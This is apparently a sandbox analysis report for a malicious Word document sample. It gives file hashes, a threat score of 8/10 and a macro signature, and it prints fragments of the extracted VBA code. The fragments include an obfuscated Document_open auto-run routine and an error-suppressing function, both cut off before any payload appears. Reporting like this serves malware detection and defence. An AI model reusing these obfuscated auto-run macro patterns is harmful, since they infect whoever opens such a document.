General

  • Target

    b27c8eefda06da11bf848084041ade7b_JaffaCakes118

  • Size

    220KB

  • MD5

    b27c8eefda06da11bf848084041ade7b

  • SHA1

    5c76a8150b9d56606596daacdbe769c488809f04

  • SHA256

    56863d3d891bcd7172c3c903618e8b5e15fd393f4dfd549c79a0b59774c0833a

  • SHA512

    ba457e7625474f7240209c1dd8871c60dce1bcce0511401c19bf0e77671e353a56d56424ca1aaf442b8c899d3464d42f33743ae925f69ceb56c0633911ccfb13

  • SSDEEP

    3072:b4tcTvjvTY140818tIP4ovpmSGju9jDW1M+7Hp3C:EtcnvE140o8tIP4apZjDjm1C

Score
8/10

Malware Config

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • b27c8eefda06da11bf848084041ade7b_JaffaCakes118
    .doc windows office2003

    Evmwfs38z7u

    1
    Attribute VB_Name = "Evmwfs38z7u"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9
    Private Sub Document_open()
    10
    E36u8kije212xyoh6_ = Array(Lcvuaap_8wlp9c3hj7 + "Cudxek5hdil1785k8F5uslly4m3z7qfl Xnmqrkg4m3w7ptd37x" + Blvj30m9cti, Eo8aq0qe9x3ft13n5, T8dwdhdp_pqz.F301p8dj6hmm, X_5djzldvsemeje0 + "Ntsx5qsdquq1cg Dnxi_ceh1nn9_wssbv H6lbcula5e6ns Eh2x8_nol4kqs")

    T8dwdhdp_pqz

    1
    Attribute VB_Name = "T8dwdhdp_pqz"
    2
    Attribute VB_Base = "0{7761E93A-2A3A-4F95-A9D3-C3EF81A407C4}{B36C846D-6A68-41F4-907E-68FF25C9F127}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = False
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = False
    9
    Function F301p8dj6hmm()
    10
    On Error Resume Next

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.